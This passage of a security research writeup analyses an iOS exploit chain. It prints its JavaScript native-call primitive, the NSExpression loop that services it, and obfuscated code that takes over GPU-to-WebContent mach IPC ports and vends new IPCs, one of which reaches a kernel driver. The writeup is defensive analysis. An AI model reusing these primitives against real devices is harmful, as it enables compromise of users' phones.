  mach_make_memory_entry: 10n,

  mach_port_type: 11n,

  IOMainPort: 12n,

  IOServiceMatching: 13n,

  IOServiceGetMatchingService: 14n,

  IOServiceOpen: 15n,

  IOConnectCallMethod: 16n,

  open: 17n,

  sprintf: 18n,

  printf: 19n

};

These match up perfectly with the first 20 symbols which the NSExpression looked up via dlsym.

For each of those symbols they define a JS wrapper, like for example this one for task_get_special_port:

function task_get_special_port(task, which_port, special_port) {

    return fcall(all_function["task_get_special_port"], task, which_port, special_port)

}

They declare two typed arrays (backed by ArrayBuffers), one named lock and one named func_buffer:

var lock = new Uint8Array(32);

var func_buffer = new BigUint64Array(24);

They use the read64 primitive to store the address of those buffers into two more variables, then set the first byte of the lock buffer to 1:

var lock_addr = read64(addrof(lock).add(16)).noPAC().asDouble();

var func_buffer_addr = read64(addrof(func_buffer).add(16)).noPAC().asDouble();

lock[0] = 1;

They then define the fcall function which the JS wrappers use to call the native symbols:

function

fcall(func_idx,

      x0 = 0x34343434n, x1 = 1n, x2 = 2n, x3 = 3n,

      x4 = 4n, x5 = 5n, x6 = 6n, x7 = 7n,

      varargs = [0x414141410000n,

                 0x515151510000n,

                 0x616161610000n,

                 0x818181810000n])

{

  if (typeof x0 !== "bigint") x0 = BigInt(x0.toString());

  if (typeof x1 !== "bigint") x1 = BigInt(x1.toString());

  if (typeof x2 !== "bigint") x2 = BigInt(x2.toString());

  if (typeof x3 !== "bigint") x3 = BigInt(x3.toString());

  if (typeof x4 !== "bigint") x4 = BigInt(x4.toString());

  if (typeof x5 !== "bigint") x5 = BigInt(x5.toString());

  if (typeof x6 !== "bigint") x6 = BigInt(x6.toString());

  if (typeof x7 !== "bigint") x7 = BigInt(x7.toString());

  let sanitised_varargs =

    varargs.map(

      (x => typeof x !== "bigint" ? BigInt(x.toString()) : x));

  func_buffer[0] = func_idx;

  func_buffer[1] = x0;

  func_buffer[2] = x1;

  func_buffer[3] = x2;

  func_buffer[4] = x3;

  func_buffer[5] = x4;

  func_buffer[6] = x5;

  func_buffer[7] = x6;

  func_buffer[8] = x7;

  sanitised_varargs.forEach(((x, i) => {

    func_buffer[i + 9] = x

  }));

  lock[0] = 0;

  lock[4] = 0;

  while (lock[4] != 1);

  return new Int64("0x" + func_buffer[0].toString(16))

}

This coerces each argument to a BigInt then fills the func_buffer first with the index of the function to call then each argument in turn. It clears two bytes in the lock ArrayBuffer then waits for one of them to become 1 before reading the return value, effectively implementing a spinlock.

JS 2 doesn't call fcall though. We now return to the NSExpression to analyse what must be the other side of that ArrayBuffer "shared memory" function call primitive.

In the background

Once JS 2 has been evaluated the NSExpression again uses the [JSContext objectForKeyedSubscript:] method to read the lock_addr and func_buffer_addr variables.

It then creates another NSInvocation, but this time instead of using the double invocation trick it sets the target of the NSInvocation to an NSExpression, sets the selector to expressionValueWithObject:, and sets the second argument to the context dictionary which contains the variables defined in the NSExpression. They then call performSelectorInBackground:sel(invoke), causing part of the serialized object to be evaluated on a different thread. It's that background code which we'll look at now:

Loopy landscapes

NSExpressions aren't great for building loop primitives. We already saw that the loop to traverse the linked-list of pthreads was just unrolled 100 times. This time around they want to create an infinite loop, which can't just be unrolled! Instead they use the following construct:

Diagram showing a NSNull alloc node with two arguments, both of which point to the same  child node

They build a tree where each sub-level is evaluated twice by having two arguments which both point to the same expression. Right at the bottom of this tree we find the actual loop body. There are 33 of these doubling-nodes meaning the loop body will be evaluated 2^33 times, effectively a while(1) loop.
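The construct is easy to reproduce in tooling terms. A sketch of how such a tree could be generated, where nsnull_alloc_call is a hypothetical builder for the sequencing node described earlier:

def make_loop(body, levels=33):

  # each level passes its single child as both arguments of a

  # side-effect-free [NSNull alloc] call, so evaluation doubles at every

  # level and the body at the bottom runs 2**levels times

  node = body

  for _ in range(levels):

    node = nsnull_alloc_call([node, node])

  return node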

Let's look at the body of this loop:

[v_OSSpinLockLockInvocationInstance

  setTarget:[v_functions_listener_lock longLongValue] ];

[v_OSSpinLockLockInvocationInstance

  setSelector:[@0x43434343 longLongValue] ];

[v_OSSpinLockLockInvocationInstanceIMP

  setTarget:v_OSSpinLockLockInvocationInstance ];

[v_OSSpinLockLockInvocationInstanceIMP invoke];

v_functions_listener_lock is the address of the backing buffer of the ArrayBuffer containing the "spinlock" which the JS unlocks after writing all the function call parameters into the func_buffer ArrayBuffer. This calls OSSpinLockLock to lock that lock.

The NSExpression reads the function index from the func_buffer ArrayBuffer backing buffer then reads 19 argument slots, writing each 64-bit value into the corresponding slot (target, selector, arguments) of an NSInvocation. They then convert the function index into a string and call valueForKey on the context dictionary which stores all the NSExpression variables to find the variable with the provided numeric string name (recall that they defined a variable called '0' storing a PACIZA'ed pointer to "syscall".)

They use the double invocation trick to call the target function then extract the return value from the NSInvocation and write it into the func_buffer:

[v_serializedInvName getReturnValue:[set_msb(v_functions_listener_buffer) longLongValue] ];

Finally, the loop body ends with an arbitrary write to unlock the spinlock, allowing the JS which was spinning to continue and read the function call result from the ArrayBuffer.
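Put together, the two sides form a classic shared-memory mailbox. Here's a toy Python model of the protocol - my own mock, not the exploit's code; in the real thing the buffers are the ArrayBuffer backing stores, the server loop is the doubling-tree NSExpression and the call happens via the double-invocation trick:

import struct, threading, time

lock = bytearray([1, 0, 0, 0, 0, 0, 0, 0])  # lock[0] taken, lock[4] clear

func_buffer = bytearray(8 * 24)

def server(functions):

  while True:

    while lock[0]:              # stands in for OSSpinLockLock

      time.sleep(0)

    lock[0] = 1                 # lock re-taken

    idx, x0 = struct.unpack_from("<QQ", func_buffer, 0)

    ret = functions[idx](x0)

    struct.pack_from("<Q", func_buffer, 0, ret)   # result reuses slot 0

    lock[4] = 1                 # wake the spinning client

def fcall(idx, x0):

  struct.pack_from("<QQ", func_buffer, 0, idx, x0)

  lock[4] = 0

  lock[0] = 0                   # release the server

  while lock[4] != 1:           # spin for the reply

    time.sleep(0)

  return struct.unpack_from("<Q", func_buffer, 0)[0]

threading.Thread(target=server, args=([lambda x: x + 1],), daemon=True).start()

print(fcall(0, 41))             # prints 42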

Then back in the main NSExpression thread it evaluates one final piece of JS in the same JSContext:

JS3

Unlike JS 1 and 2 and the NSExpression, JS 3 is stripped and partially obfuscated, though with some analysis most of the names can be recovered. For example, the script starts by defining a number of constants - these in fact come from a number of system headers, and the values appear in exactly the same order as in the headers:

const z = 16;

const u = 17;

const m = 18;

const x = 19;

const f = 20;

const v = 21;

const b = 22;

const p = 24;

const l = 25;

const w = 26;

const y = 0;

const B = 1;

const I = 2;

const F = 3;

const U = 4;

const k = 2147483648;

const C = 1;

const N = 2;

const S = 4;

const T = 0x200000000n;

Lining those values up against the system headers recovers the original names:

const MACH_MSG_TYPE_MOVE_RECEIVE = 16;

const MACH_MSG_TYPE_MOVE_SEND = 17;

const MACH_MSG_TYPE_MOVE_SEND_ONCE = 18;

const MACH_MSG_TYPE_COPY_SEND = 19;

const MACH_MSG_TYPE_MAKE_SEND = 20;

const MACH_MSG_TYPE_MAKE_SEND_ONCE = 21;

const MACH_MSG_TYPE_COPY_RECEIVE = 22;

const MACH_MSG_TYPE_DISPOSE_RECEIVE = 24;

const MACH_MSG_TYPE_DISPOSE_SEND = 25;

const MACH_MSG_TYPE_DISPOSE_SEND_ONCE = 26;

const MACH_MSG_PORT_DESCRIPTOR = 0;

const MACH_MSG_OOL_DESCRIPTOR = 1;

const MACH_MSG_OOL_PORTS_DESCRIPTOR = 2;

const MACH_MSG_OOL_VOLATILE_DESCRIPTOR = 3;

const MACH_MSG_GUARDED_PORT_DESCRIPTOR = 4;

const MACH_MSGH_BITS_COMPLEX = 0x80000000;

const MACH_SEND_MSG = 1;

const MACH_RCV_MSG = 2;

const MACH_RCV_LARGE = 4;

const MACH64_SEND_KOBJECT_CALL = 0x200000000n;

The code begins by using a number of symbols passed in from the outer RCE js to find the HashMap storing the mach ports implementing the WebContent to GPU Process IPC:

//WebKit::GPUProcess::GPUProcess

var WebKit::GPUProcess::GPUProcess =

  new Int64("0x0a1a0a1a0a2a0a2a");

// offset of m_webProcessConnections HashMap in GPUProcess

var offset_of_m_webProcessConnections =

  new Int64("0x0a1a0a1a0a2a0a2b"); // 136

// offset of IPC::Connection m_connection in GPUConnectionToWebProcess

var offset_of_m_connection_in_GPUConnectionToWebProcess =

 new Int64("0x0a1a0a1a0a2a0a2c"); // 48

// offset of m_sendPort

var offset_of_m_sendPort_in_IPC_Connection = new Int64("0x0a1a0a1a0a2a0a2d"); // 280

// find the m_webProcessConnections HashMap:

var m_webProcessConnections =

  read64( WebKit::GPUProcess::GPUProcess.add(

           offset_of_m_webProcessConnections)).noPAC();

They iterate through the entries in that HashMap to collect the mach ports representing all the GPU Process to WebContent IPC connections:

var entries_cnt = read64(m_webProcessConnections.sub(8)).hi().asInt32();

var GPU_to_WebProcess_send_ports = [];

for (var he = 0; he < entries_cnt; he++) {

  var hash_map_key = read64(m_webProcessConnections.add(he * 16));

  if (hash_map_key.is0() ||

      hash_map_key.equals(const_int64_minus_1))

  {

    continue

  }

 

  var GPUConnectionToWebProcess =

    read64(m_webProcessConnections.add(he * 16 + 8));

  if (GPUConnectionToWebProcess.is0()) {

    continue

  }

  var m_connection =

    read64(

      GPUConnectionToWebProcess.add(

        offset_of_m_connection_in_GPUConnectionToWebProcess));

  var m_sendPort =

    BigInt(read64(

      m_connection.add(

        offset_of_m_sendPort_in_IPC_Connection)).lo().asInt32());

  GPU_to_WebProcess_send_ports.push(m_sendPort)

}

They allocate a new mach port then iterate through each of the GPU Process to WebContent connection ports, sending each one a mach message with a port descriptor containing a send right to the newly allocated port:

for (let WebProcess_send_port of GPU_to_WebProcess_send_ports) {

  for (let _ = 0; _ < d; _++) {

    // memset the message to 0

    for (let e = 0; e < msg.byteLength; e++) {

      msg.setUint8(e, 0)

    }

  // complex message

  hello_msg.header.msgh_bits.set(

    msg, MACH_MSG_TYPE_COPY_SEND | MACH_MSGH_BITS_COMPLEX, 0);

  // send to the web process

  hello_msg.header.msgh_remote_port.set(

    msg, WebProcess_send_port, 0);

  hello_msg.header.msgh_size.set(msg, hello_msg.__size, 0);

  // one descriptor

  hello_msg.body.msgh_descriptor_count.set(

    msg, 1, hello_msg.header.__size);

  // send a right to the comm port:

  hello_msg.communication_port.name.set(

    msg, comm_port_receive_right,

    hello_msg.header.__size + hello_msg.body.__size);

  // give other side a send right

  hello_msg.communication_port.disposition.set(

    msg, MACH_MSG_TYPE_MAKE_SEND,

    hello_msg_buffer.header.__size + hello_msg.body.__size);

  hello_msg.communication_port.type.set(

    msg, MACH_MSG_PORT_DESCRIPTOR,

    hello_msg.header.__size + hello_msg.body.__size);

  msg.setBigUint64(hello_msg.data.offset, BigInt(_), true);

  // send the request

  kr = mach_msg_send(u8array_backing_ptr(msg));

  if (kr != KERN_SUCCESS) {

    continue

  }

}

Note that, apart from having to use ArrayBuffers instead of pointers, this looks almost like it would if it was written in C and executing truly arbitrary native code. But as we've seen, there's a huge amount of complexity hidden behind that simple call to mach_msg_send.

The JS then tries to receive a reply to the hello message; if it gets one, it's assumed that it has found the WebContent process which compromised the GPU process and is waiting for the GPU process exploit to succeed.

It's at this point that we finally approach the last stages of this writeup.

Last Loops

Having established a new communications channel with the native code running in the WebContent process the JS enters an infinite loop waiting to service requests:

function handle_comms_with_compromised_web_process(comm_port) {

  var kr = KERN_SUCCESS;

  let request_msg = alloc_message_from_proto(req_proto);

  while (true) {

    for (let e = 0; e < request_msg.byteLength; e++) {

      request_msg.setUint8(e, 0)

    }

    req_proto.header.msgh_local_port.set(request_msg, comm_port, 0);

    req_proto.msgh_size.set(request_msg, req_proto.__size, 0);

    // get a request

    kr = mach_msg_receive(u8array_backing_ptr(request_msg));

    if (kr != KERN_SUCCESS) {

      return kr

    }

    let msgh_id = req_proto.header.msgh_id.get(request_msg, 0);

    handle_request_from_web_process(msgh_id, request_msg)

  }

}

In the end, this entire journey culminates in the vending of 9 new JS-implemented IPCs (msgh_id values 0 through 8.)

IPC 0:

Just sends a reply message containing KERN_SUCCESS

IPCs 1 - 4:

These interact with the AppleM2ScalerCSCDriver userclient and presumably trigger the kernel bug.

IPC 5:

Wraps io_service_open_extended, taking a service name and connection type.

IPC 6:

This takes an address and a size and creates a VM_PROT_READ | VM_PROT_WRITE mach_memory_entry covering the requested region which it returns via a port descriptor.

IPC 7:

This IPC extracts the requested mach port name and returns it via a MOVE_SEND disposition.

IPC 8:

This simply calls the exit syscall, presumably to cleanly terminate the process. If that fails, it causes a NULL pointer dereference to crash the process:

  case request_id_const_8: {

    syscall(1, 0);

    read64(new Int64("0x00000000"));

    break

  }

Conclusion

This exploit was undoubtedly complex. Often this complexity is interpreted as a sign that the difficulty of finding and exploiting vulnerabilities is increasing. Yet the buffer overflow vulnerability at the core of this exploit was not complex - it was a well-known, simple anti-pattern in a programming language whose security weaknesses have been studied for decades. I imagine that this vulnerability was relatively easy for the attackers to discover.

The vast majority of the complexity lay in the later post-compromise stages - the glue which connected this IPC vulnerability to the next one in the chain. In my opinion, the reason the attackers invested so much time and effort in this part is that it's reusable. It is a high one-time cost which then hugely decreases the marginal cost of gluing the next IPC bug to the next kernel bug.

Even in a world with NX memory, mandatory code signing, pointer authentication and a myriad of other mitigations, creative attackers are still able to build weird machines just as powerful as native code. The age of data-only exploitation is truly here; yet another mitigation to fix one more trick is unlikely to end that. What does make a difference is focusing on the fundamentals: early-stage design and code reviews, broad testing, and code quality. This vulnerability was introduced less than two years ago; as an industry we should, at a minimum, be aiming to ensure that new code is vetted for well-known vulnerabilities like buffer overflows. That's a low bar which is clearly still not being met.